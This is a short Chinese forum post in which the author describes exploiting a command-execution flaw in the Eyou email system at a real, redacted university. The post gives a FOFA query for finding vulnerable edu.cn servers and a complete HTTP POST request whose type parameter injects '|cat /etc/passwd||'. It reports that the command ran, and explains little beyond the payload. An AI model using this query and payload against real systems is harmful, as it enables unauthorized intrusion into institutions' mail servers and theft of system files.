利用护网爆出漏洞挖edu 命令执行

hpb1   ·   发表于 2021-06-23 15:41:02   ·   实战纪实

前言:

前阵子护网,爆出了很多漏洞,于是我就想去edu 试试看,终于找到一个亿邮电子邮件系统 远程命令执行漏洞。

漏洞挖掘历程:

首先用fofa进行搜索,语法为:body="亿邮电子邮件系统" && org="China Education and Research Network Center",这时候就可以看到用邮件系统的有哪些edu 大学使用。


经过不断翻找,终于发现了一个漏网之鱼,xxx大学,打开页面如下。

漏洞请求包如下

POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
Host: xxxx.edu.cn
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://fofa.so/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: EMPHPSID=9loojcdtnm13afhvfbtmb4j611; empos=0; emLoginTo=via_acct
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

type='|cat /etc/passwd||'


从上图可以看到,成功命令执行。文章到此就结束了。水文勿喷。告辞。

用户名金币积分时间理由
Track-聂风 35.00 0 2021-06-24 12:12:37 一个受益终生的帖子~~

打赏我,让我更有动力~

1 Reply   |  Until 2021-9-24 | 1018 View

test_707
发表于 2021-9-24

为什么这样写,能讲讲原理更好啦

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2023 掌控者 All Rights Reserved.